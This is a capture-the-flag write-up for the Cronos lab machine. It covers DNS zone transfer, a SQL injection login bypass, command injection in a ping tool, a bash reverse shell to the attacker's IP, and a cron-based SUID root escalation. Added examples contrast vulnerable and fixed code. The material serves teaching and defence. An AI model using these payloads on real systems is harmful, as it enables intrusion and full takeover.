Cronos

Published: Mar 21, 2025

Enumeration

Scan

Starting off with a basic nmap scan:

nmap -sC -sV -oN scans/detailed.nmap 10.10.10.13

Web

Port 80 is always a great place to start looking, but navigating to the website just shows the default Apache page, which tells us the server is only answering for names it knows about. That makes DNS (port 53, open in the scan) the next thing to look at.

DNS

Let's see if we can pull some more useful information from the DNS server.
Using nslookup, point the resolver at the target and do a reverse lookup of its own address; the PTR record gives us the nameserver's hostname and, with it, the domain name (cronos.htb) we need for a zone transfer:

$ nslookup
> server 10.10.10.13
> 10.10.10.13

Now, we can use dig to attempt a zone transfer and look for subdomains.

For those of you new to this topic, dig is the "Domain Information Groper", a command-line tool for querying DNS servers. Using the axfr (Authoritative Transfer) query type requests a full DNS zone transfer. This functionality is meant for replicating DNS records between a primary and its secondaries, and a correctly configured server only allows it from those secondaries (allow-transfer in BIND). Here the server answers anyone, so we get the complete list of names in the zone.

dig axfr @10.10.10.13 cronos.htb
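A zone transfer usually returns more names than you want to add to /etc/hosts by hand. The following is an added example, not part of the original write-up: it parses dig's AXFR output, keeps the A/AAAA records, and groups the names per IP into ready-made hosts-file lines. The sample output is constructed for this example; apart from cronos.htb and admin.cronos.htb, the record names in it (ns1, www) are placeholders, and the serial and TTL values are made up.

```python
from collections import defaultdict

# Constructed sample of what `dig axfr @10.10.10.13 cronos.htb` prints when the
# server permits transfers to anyone. Names other than cronos.htb and
# admin.cronos.htb are placeholders for this example.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.24 <<>> axfr @10.10.10.13 cronos.htb
;; global options: +cmd
cronos.htb.\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.\t604800\tIN\tNS\tns1.cronos.htb.
cronos.htb.\t604800\tIN\tA\t10.10.10.13
admin.cronos.htb.\t604800\tIN\tA\t10.10.10.13
ns1.cronos.htb.\t604800\tIN\tA\t10.10.10.13
www.cronos.htb.\t604800\tIN\tA\t10.10.10.13
cronos.htb.\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 2 msec
"""


def parse_axfr(output: str) -> dict:
    """Return {hostname: set_of_ips} for every A/AAAA record in dig axfr output.

    dig prints one record per line as: name TTL class type rdata. Comment lines
    start with ';' and are skipped, as are SOA/NS/MX/etc. records.
    """
    hosts = defaultdict(set)
    for line in output.splitlines():
        if not line or line.startswith(";"):
            continue
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN" or fields[3] not in ("A", "AAAA"):
            continue
        name = fields[0].rstrip(".")      # drop the trailing root dot
        hosts[name].add(fields[4])
    return dict(hosts)


def hosts_lines(records: dict) -> list:
    """Group names per IP into lines that can be appended to /etc/hosts."""
    by_ip = defaultdict(list)
    for name in sorted(records):
        for ip in records[name]:
            by_ip[ip].append(name)
    return [f"{ip} {' '.join(names)}" for ip, names in sorted(by_ip.items())]


if __name__ == "__main__":
    for line in hosts_lines(parse_axfr(SAMPLE_AXFR)):
        print(line)
```

Pipe real dig output in instead of the sample and append the result to /etc/hosts; the grouping also makes it obvious when a zone points different names at different hosts, which is worth checking before assuming everything lives on the target.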

Web (Again)

"admin.cronos.htb" looks the most interesting, so let's take a look after adding it to /etc/hosts (our machine isn't using the target's DNS server, so the name won't resolve otherwise).

Foothold

SQL Injection

When greeted with a login panel without having any credentials, it's usually a good idea to try some SQL injection: submitting SQL syntax that the backend concatenates straight into its query. In this case, one of the most basic forms of SQL injection is successful.
The following payload bypasses the authentication mechanism by closing the username string and commenting out the rest of the query, including the password check. The trailing "-" matters on MySQL, where "--" only starts a comment when followed by whitespace; the extra character keeps that space from being trimmed.

UserName: admin'-- -
Password: AnythingWorksHere
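To see exactly why that payload works, here is an added example (not code from the box or the write-up) of the two ways the login query could have been written. It uses an in-memory SQLite table with constructed users; the plaintext passwords and the table layout are assumptions for the demonstration. The vulnerable version interpolates the input into the SQL text, so the single quote ends the username literal and "-- -" comments out the password comparison; the safe version binds the same input as a parameter, where it is just data.

```python
import sqlite3

# Constructed toy user table. Real applications store password hashes;
# plaintext is used only to keep the comparison visible.
CONSTRUCTED_USERS = [("admin", "s3cr3t!"), ("bob", "hunter2")]


def _connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", CONSTRUCTED_USERS)
    return conn


def build_query(username: str, password: str) -> str:
    """String concatenation of the kind that makes the admin panel injectable."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(username: str, password: str):
    """Return the authenticated username or None; user input becomes SQL syntax."""
    row = _connect().execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(username: str, password: str):
    """Same check with bound parameters: the quote and comment are never parsed."""
    row = _connect().execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "admin'-- -"
    print(build_query(payload, "AnythingWorksHere"))
    print("vulnerable:", login_vulnerable(payload, "AnythingWorksHere"))
    print("safe:      ", login_safe(payload, "AnythingWorksHere"))
```

Printing the built query is the quickest way to explain an injection in a report: everything after "-- " is dead text, so the database only ever evaluates `username = 'admin'`.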

Custom Web App

After getting logged in, we are greeted with something that looks like a custom networking tool.

Trying the ping feature, it looks like it simply runs the OS ping command against the specified IP.
To confirm the command really executes rather than just echoing something back, I listen for ICMP on my VPN interface with tcpdump and enter my own IP in the tool:

sudo tcpdump -ni tun0 icmp

Command Injection

Since it seems to be running an OS command with our input pasted into the command line, we can try some basic OS command injection payloads, and see that even the most basic one works: a semicolon ends the ping command and whatever follows runs as a second command.

10.10.14.7; whoami

Abusing this OS command injection, we can get a reverse shell as www-data (the web server's user), with a listener waiting on port 443 of the attacking machine:

10.10.14.7; bash -c 'bash -i >& /dev/tcp/10.10.14.7/443 0>&1'
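The ping tool and the reverse shell above both go through the same defect: user input joined onto a shell command line. As an added example that is not code from the box, the following shows that pattern next to a hardened version that validates the input as an IP address and passes it as a single argv element with no shell in between. The `ping` binary is replaced by `echo` (an assumption made so the example runs offline and without root); swap in `["ping", "-c", "1"]` on a real host.

```python
import ipaddress
import subprocess

# Stand-in for the box's ping invocation so this runs with no network:
# echo just prints the command it would have run.
PING_ARGV = ["echo", "ping", "-c", "1"]


def run_vulnerable(ip: str) -> str:
    """Mirror of the Cronos tool: input is concatenated into a shell string.

    A ';' in the input ends the ping command and starts a second one, which
    is exactly how '10.10.14.7; whoami' and the reverse-shell payload work.
    """
    cmd = " ".join(PING_ARGV) + " " + ip
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def run_safe(ip: str) -> str:
    """Hardened version: accept only a literal IP, and never invoke a shell.

    ipaddress.ip_address raises ValueError for anything that is not an address,
    so '10.10.14.7; whoami' is rejected before any process starts. Passing a
    list to subprocess (shell=False) means the argument is handed to the
    binary verbatim; no shell metacharacters are interpreted.
    """
    addr = ipaddress.ip_address(ip.strip())
    result = subprocess.run(PING_ARGV + [str(addr)], shell=False,
                            capture_output=True, text=True)
    return result.stdout


def is_injection_attempt(ip: str) -> bool:
    """Detection helper for logs: True when the input is not a bare IP address."""
    try:
        ipaddress.ip_address(ip.strip())
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    payload = "10.10.14.7; echo INJECTED"
    print("vulnerable:\n" + run_vulnerable(payload))
    print("flagged:", is_injection_attempt(payload))
    try:
        run_safe(payload)
    except ValueError as exc:
        print("safe: rejected ->", exc)
    print("safe:", run_safe("10.10.14.7"), end="")
```

The allow-list check is the important part; escaping metacharacters is the weaker alternative because every shell feature that is missed (backticks, `$()`, newlines) becomes another payload. The same `is_injection_attempt` check is what you would run over the tool's access logs when responding to an incident on a host like this one.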

Privilege Escalation

Cron

Taking a look at the system-wide crontab (/etc/crontab), we see a non-default job running as root every minute. Better yet, it runs a PHP file, /var/www/laravel/artisan, that is owned and writable by www-data, the user we already are.

Since we can overwrite that file, anything we put in it is executed by the PHP interpreter as root within a minute. I will opt for a SUID shell: the PHP below copies bash to /tmp and sets the setuid bit on the copy. Because root performs the copy, the new file is owned by root, so it runs with root's effective uid. Remember to start it with bash's -p option, otherwise bash drops the elevated effective uid back to the real uid on startup.

<?php system("cp /bin/bash /tmp/bokkish; chmod 4775 /tmp/bokkish") ?>